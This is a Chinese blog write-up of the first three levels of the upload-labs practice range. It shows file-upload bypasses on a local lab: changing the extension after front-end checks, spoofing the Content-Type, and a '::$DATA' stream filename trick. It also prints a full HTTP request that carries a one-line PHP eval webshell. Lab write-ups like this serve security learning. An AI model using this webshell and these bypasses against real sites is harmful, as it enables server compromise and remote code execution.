【web安全】文件上传漏洞

upload-labs靶场

第一关 绕过前端

先打开哥斯拉,生成木马,选择php

打开brup开浏览器,上传文件,就会发现被阻止了,还没抓到包呢

那就是被前端代码阻止了,那通常前端代码都只能防御后缀名

我们抓到包后直接改回名称即可

那就先复制木马文件,再改成 .png 图片格式结尾

然后打开抓包,上传绕过前端,就能看到抓去的数据包了

改回去php即可

右键查看一下图片,就会发现图片地址都给我们了

bash 复制代码
# 所以木马位置在这里
http://127.0.0.1/upload-labs-master/upload/gesila.php

上哥斯拉测试连接,没毛病,下一题

第二关 绕过后端的类型判断

第二关可以用第一关的方法,但不知道为什么可以,于是看了一下源码,原来是类型绕过了

上传图片的时候,类型自动是图片类型,而这关可以直接用php文件上传

抓包改成图片类型就行了,连后缀名都不需要改

第三关 隐藏流文件双写绕过

上传木马文件,数据包增加下面东西,其实我也没看太懂

但可能会是一个比较实用的技巧

因为我看了一下源代码,源码是用php代码写常量数组判断后缀名是否在数组的后缀名中

所以这是很常见的防御写法这种破解应该是比较实用

完整数据包如下:

bash 复制代码
POST /upload-labs-master/Pass-03/index.php?action=show_code HTTP/1.1
Host: 127.0.0.1
Content-Length: 348
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSR1Z7D37x0XoKBw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/upload-labs-master/Pass-03/index.php?action=show_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ahreltidkjthrep12lbfgq9got
Connection: close

------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="upload_file"; filename="gesila.php::$DA::$DATATA"
Content-Type: application/octet-stream

<?php
eval($_POST["pass"]);

------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="submit"

涓婁紶
------WebKitFormBoundaryRSR1Z7D37x0XoKBw--

上传之后需要查看文件名是什么?不然没法搞

这个文件名一半看懂,一半没看懂,原理也没查到

反正前面就是年月日,后面一半就不知道是什么来的了,所以需要看到有文件名才能getshell

相关推荐
用户9623779544819 小时前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行9 天前
网络安全总结
安全·web安全